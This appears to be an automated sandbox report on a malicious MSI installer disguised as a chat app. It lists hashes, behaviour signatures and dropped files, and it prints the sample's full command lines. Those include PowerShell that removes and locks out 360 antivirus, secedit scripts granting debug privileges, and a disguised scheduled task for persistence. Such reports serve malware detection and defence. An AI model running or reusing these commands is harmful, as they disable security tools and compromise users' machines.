Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    24/08/2024, 11:49

General

  • Target

    Iinechats-zh64.2.1PC.msi

  • Size

    71.2MB

  • MD5

    89b29987321cca509c7eb26b98d48cea

  • SHA1

    316f65770a8527f8fe20d7eb159abc15068f446f

  • SHA256

    9117816190484b28a9ebdf72cd7c2873b1fd3a83d42b5719aaa6a301ae908295

  • SHA512

    5ac3255ddfdde73a62d0af56c2980e1ba23110731d81d2ab0343a8d3266fed83f7b3541d6e243b81d6dc3e9f419b950f2cd37e7a86aba6cc336ad3d3db990c87

  • SSDEEP

    1572864:A01TYZqKCagLLDHJToX7ZeO8/5jp7dByKcyc:araLjJk7Zelfhc

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 12 IoCs
  • Executes dropped EXE 3 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Loads dropped DLL 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 43 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Iinechats-zh64.2.1PC.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1280
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding C1A7B65ED9A132004924C2710F7420A4
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\SysWOW64\fltMC.exe
          fltmc.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1476
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'360_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Hide Artifacts: Ignore Process Interrupts
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1524
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $360sd = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360sd){$360drive = [IO.Path]::GetPathRoot($360sd).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360sd -Recurse -Force;(Get-ChildItem -Path $360sd -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'360_'+$_.Name} -Force;icacls.exe $360sd /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Hide Artifacts: Ignore Process Interrupts
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1692
      • C:\ProgramData\Data\un.exe
        "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\
        3⤵
        • Executes dropped EXE
        PID:2068
      • C:\ProgramData\Program\iusb3mon.exe
        "C:\ProgramData\Program\iusb3mon.exe" false
        3⤵
        • UAC bypass
        • Adds Run key to start application
        • Checks whether UAC is enabled
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:2788
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:292
          • C:\Windows\SysWOW64\SecEdit.exe
            "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1556
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:408
          • C:\Windows\SysWOW64\SecEdit.exe
            "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2796
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1132
          • C:\Windows\SysWOW64\SecEdit.exe
            "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3012
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2288
          • C:\Windows\SysWOW64\SecEdit.exe
            "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2996
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo.>c:\inst.ini
          4⤵
          • System Location Discovery: System Language Discovery
          PID:684
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1136
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1692
    • C:\Program Files (x86)\My Product\LineInst.exe
      "C:\Program Files (x86)\My Product\LineInst.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      PID:1352
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2744
  • C:\Windows\system32\DrvInst.exe
    DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005DC" "00000000000004E4"
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious use of AdjustPrivilegeToken
    PID:2224

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Config.Msi\f7718d0.rbs

          Filesize

          9KB

          MD5

          be7a7d1d6a4986235d9c28edf44ae064

          SHA1

          a01e8cc765ec562aac7fb4edaea4b58b4adc3ff5

          SHA256

          c123842b63f585658515e2233e69e588a0025949197a1d0ddea95e791744a58a

          SHA512

          99800278754b24149359fd814110b4a18c1bbbc9487ab7b347e0d3cc1dbfcf81e38167a79bcecb113474a65c3f74f70d92cca47fb4ea4b2305460e9bc4381d95

        • C:\ProgramData\Data\rar.ini

          Filesize

          10B

          MD5

          51c11db1054dd4650a33bf481ec27060

          SHA1

          17686b75163d8753be27e407aad97a76f311fc7b

          SHA256

          fc835086345b170ac995c35f24546e1b7268e3d3524a125a9396a4ec8b7d3f35

          SHA512

          94d5c2a0cb03b38657bab246a695c6528fc5f7d3ddbe716641dd59ec83a67d6ab28c083000026d10114e7ab8f8225f7c90c9fce25ef0611f46aa3899d096d80f

        • C:\ProgramData\Data\un.exe

          Filesize

          601KB

          MD5

          4fdc31997eb40979967fc04d9a9960f3

          SHA1

          7f13bd62c13324681913304644489bb6b66f584a

          SHA256

          e9ea78fab020718cb75a116993bfa2a5fe71c163a801995adb9e5abebc7990a2

          SHA512

          15146e24afcfea221616ca1f049d96e8a5f9b1eccefd3a27df150e4699993889fc1ab4952f2ba1ab519b1056baaeeb4490894bc795d0cb4630f663fa08316b9a

        • C:\ProgramData\Data\upx.rar

          Filesize

          33KB

          MD5

          908d60cc30558e4677c56c45f4a6be36

          SHA1

          931ca511b111b244301c5f67e28ed6630a026d81

          SHA256

          a6bf48241f3f3f425b868a962d81f439041e7ead40276726a091e000f6bbb52b

          SHA512

          0dfdb4aa76c55ea34cbee1426379b6ff331cbc9c4dde8f39e7aaaa1beb40ed0ab004403bb249f4aae1f6fc0457d5d14834e66318b19e17188553687c62231032

        • C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

          Filesize

          3KB

          MD5

          69c282fdcd177c1ac4d6709ef841da65

          SHA1

          575cbac132f5215c9446e6b440ca44a2082f0644

          SHA256

          943f169c31c319417e61586d8911057321de04926e01e4cc3e6f57b3b032c28e

          SHA512

          6b686a5d6aabe4681c6e1c83d4f32bd55d9fa26fc25ed72ecd20676c6dd3bd49cee4f1e5d1b25f2d3a90a994be00bf3b1366075272d4c3ea16917806dbbe0ea7

        • C:\ProgramData\Microsoft\Program\ziliao.jpg

          Filesize

          225KB

          MD5

          bb55dcf2bb3c07e4c78bf512c036e86b

          SHA1

          5ce9f0d689512bac96d28b0b617fa854d149d0ac

          SHA256

          a4be173ca3dd8bc2fe6ae28bffa7461cd8b5926cded05eb24d3d7b50f90414ce

          SHA512

          94fde8f672bdc4b2d317407c7a901a97655bdc917da38fe217744bcf1cd8080a824fb52a03371c8e77e1d4d1fe58e051e14e9a7c7228f291a9740900738ad3ca

        • C:\ProgramData\Program\iusb3mon.exe

          Filesize

          88KB

          MD5

          07a12804f7186ea6073f41faf4404a01

          SHA1

          1de3e9858c9268b9a99bca09c2958a3c6da93ccc

          SHA256

          047c946b4b6bb2ec27eb6c208a9d1b90fc2c9dd09bf38ee1a017f6908bdc811e

          SHA512

          05cf9611b880310971858597bffbeafa025776903c274be60e598167e7c64b0ec1f5fff52f38203276329202fa238e3b3d57e65ef1a0a05ff74eb0c6a549879a

        • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log

          Filesize

          1KB

          MD5

          1ceb5165f1e435a8132c403c6542ae95

          SHA1

          cd650376bce0babd4b07b31ad595da00c8d2ed1a

          SHA256

          e5bb3bd3f3b81693d0727993a631950aee7f100f23d5090ec20e320bb0813dbf

          SHA512

          b01b4ef1dba12736e5155a3111e23b74bfaba900239b116d3d5e9a190cb7775a8d42049b1db91d069845e585ec8004fc415bdd061b8efd73dd719f4f8a3b9953

        • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log

          Filesize

          2KB

          MD5

          c6f29cf6f15bc123d0ac663038ccf886

          SHA1

          ad32e0b495d9d8e55265a3d5b0d6aad1f2123563

          SHA256

          467ef56719b3c527d861fb7874b121c8042500e86a15e04bbcef9b20834b6884

          SHA512

          c455195328246088393590197a08b19e530823510fe76247c786b96eb1ca32160969527b4eef571acef01b54d6406b04fe0cfb5a98b32290fe9fdd5c67ff23cc

        • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log

          Filesize

          2KB

          MD5

          84d68259f9ef9eed8a0506d0e3ee64c5

          SHA1

          3f794f6c237fd19b2a89bd3356d94f92f47d4e0c

          SHA256

          1c0c719476ce20f1c0e18654df032fac81baf82d62c5e314e15f9e5ff26a0f20

          SHA512

          b1aaa468ea0297e8d4ced88765e4c064db7986880537cd8f90b85872720234b78f7e1fb853460e5fd10175fc60570c2885b4a4e5143fd790e1a9d651f1bbac51

        • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log

          Filesize

          1KB

          MD5

          26f969af9fe091926bbf9be6bf8cefe8

          SHA1

          70ae93fef3db23d35dfdc7701d05a3c4dbde76c5

          SHA256

          0d1362f342923bdd2f4585be8fc853e9fbfa8c83ba89f9be6ee302c8e6b2d1c8

          SHA512

          67e464b386f513e0e1b1f37d523778c258b785f89168e28f8ecedb6a0b6a361ca982ae47e6f915b49be1f4d0e10dd62a2a194bc84276f81b4af961ab76959278

        • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log

          Filesize

          2KB

          MD5

          5a18280aed20e8cc704c6211597e4195

          SHA1

          4286c3091e9bd83e03f1dd3b498b26b5cfb3741d

          SHA256

          4ef2d1e0d41531cbf24b559261586d4abb7f3aaa8637bd895f630ed3b1d3ba45

          SHA512

          49051747339cd89a2d3892f8b133ef60ff696681cdeaa257039763c37c8d606904c6b2ca3c623adf1a2d7002f5f44f1418fea017d9fc42ef688d3d2b2230dd85

        • C:\Users\Admin\AppData\Local\Temp\nsj2619.tmp\InstWelcome.ini

          Filesize

          1KB

          MD5

          4c10e0493d97340b8b83c15b50601d0a

          SHA1

          ebcb339a63fe6b54b6ee530bceff422b401fcbfa

          SHA256

          5eabbefaf832e3a3500b3e6c64d4fe804c07f9441d7cd3b0fbe14116684f0eeb

          SHA512

          4b14401b1f964ba27d2a9062d5b0b68de47f910e322a2e6a2e241885bd744ff861b4dbc86dc8b680d3938805087efabf539c7e18522bb21e1bcbefaaa92e3be8

        • C:\Users\Admin\AppData\Local\Temp\nsj2619.tmp\killProc.dll

          Filesize

          89KB

          MD5

          b9edf77857f539db509c59673523150a

          SHA1

          23276a59846d61d0a1826ba3b3f3c4b47b257f20

          SHA256

          62f8e07d3ba5e9e57aaf529786a92931098f6ee33c6ab5057be5ad4ee0545b31

          SHA512

          8bedf1ffd4d5f1853e1794e32b7ff482c3c207a8d6600a54d9f0c583feac8711ac70c985f4579a947ee3c686e179dcdf42752bb45da2a5b9254f372265a92f79

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

          Filesize

          7KB

          MD5

          ecc0b5d82e0ca7e89a16b78231d413fd

          SHA1

          e6dd6612a4ccbd222564fd6a82339d2d4136b095

          SHA256

          3b2e927d1dca97ee02ff3ef9b718790f2e26f64a853ec1ca5d6d12e9cd3702e9

          SHA512

          f90419cd219458d654754ac4f05ec95b5698d0e90644d9d6ae8cabf81d8c2df0273a1825153773efd182ea40cff8e970f64b40cacb25d7aadd8d54ca2775bbb5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

          Filesize

          7KB

          MD5

          dec6930a17dab8b7fcd91a0f3e46f8cd

          SHA1

          a9eb62e89513115d1af0e9afce3081936dc31c8c

          SHA256

          ed697ac5496d8e1c48c7c9a247d1207b6df0c02f8d0514f13a51b07454536e66

          SHA512

          cff141b57b66fd30a873e19e40f1efe2b03293f972608369ab74a0caaf0fb40abd3db81e6fe17ec9a23c0d2220d1dcb3fe1ec0a973421572a35bc7eb275daf44

        • C:\Windows\Installer\MSI195A.tmp

          Filesize

          990KB

          MD5

          b9ff2dd6924711531e59e90581cda548

          SHA1

          6c8d572587c40a1fd8c20bd4f1929bb0fbb12009

          SHA256

          ad564d4d64bb74ea6819e081534131f6f78e3c019d37abbc3eef8e09dfed96d7

          SHA512

          d026c8128c1a182aa7f9d7cba179b411ad679e3bf89723a3498ab493cb6938579ee703ade35595f6b5178413e0df7f6f9a152a5036759e42f1d6f52cc0a61227

        • \Users\Admin\AppData\Local\Temp\nsj2619.tmp\InstallOptions.dll

          Filesize

          15KB

          MD5

          aaa17e959957fb648c7b79ff7d1c5b83

          SHA1

          aefc13b7926892bf952ed7fec77b73d98b27bd91

          SHA256

          dbd62ba3c05d89511396c68c40a25f8ceabc5976fdadd11b704d2ecbc6c5b96f

          SHA512

          b05625196ff2dca7428cf6e66e492814f6e3144e963505cf4401b1dd4e6b3467100425aa0527c4f6068e13c7a9b72c88c11a87bc80d89bf3fd4183e5bd8fbab9

        • \Users\Admin\AppData\Local\Temp\nsj2619.tmp\LangDLL.dll

          Filesize

          5KB

          MD5

          65e28969588b8ee8f867db3d16c92f00

          SHA1

          8c183d9c159229b4cbd4778b44677444320a5e8d

          SHA256

          8eb83a1a5c184ec061fb48acc18beac9d621f7476ac75d3e917901bc9f70e79a

          SHA512

          203724506b97b93c42ca286bad49f81c3e2c4c3dbf17bcaaecda82a2cc2a17b6e3daf87de1d0bef6c03a4c6dac2703ca77335c871eff3eaa074c9c48d80d636a

        • \Users\Admin\AppData\Local\Temp\nsj2619.tmp\System.dll

          Filesize

          11KB

          MD5

          d77839cc52a47e2db7d7fb944643fb0a

          SHA1

          ed3cd493e5a465a143862df3f280e936f3bd2fac

          SHA256

          93b73294a24201a4299fd0da7e0ab0dbffa130da300cc3a2c80d2aa7f2da7c77

          SHA512

          76f2739990bfae391f8c4c7346487150fa70eca82a15adff14e84d83ca03af5b202b8abab139f56b59dffd942a26aacdb359548367be7f80ff6bbf28b973e77e

        • \Users\Admin\AppData\Local\Temp\nsj2619.tmp\UserInfo.dll

          Filesize

          4KB

          MD5

          6461ba2b54c2239503eff55de913c437

          SHA1

          7796499cc23eee4c522be381987913e6c5e8826e

          SHA256

          4658e40d14895f792cb5ea8bbee7dc95a6bff6478f8e41c3732a66b92fccc0d5

          SHA512

          12ae466bc824d57d8e44b5a2dca395b98f002fe3cfe4ed544939d7ce5480b174934adf4e9e06ea9d6907e64e180f1b1b6f9d25d607713ca23bb090f1cf3379cf

        • memory/2788-68-0x0000000001CA0000-0x0000000001CE0000-memory.dmp

          Filesize

          256KB

        • memory/2788-215-0x0000000001CA0000-0x0000000001CE0000-memory.dmp

          Filesize

          256KB

        • memory/2788-65-0x0000000001CA0000-0x0000000001CE0000-memory.dmp

          Filesize

          256KB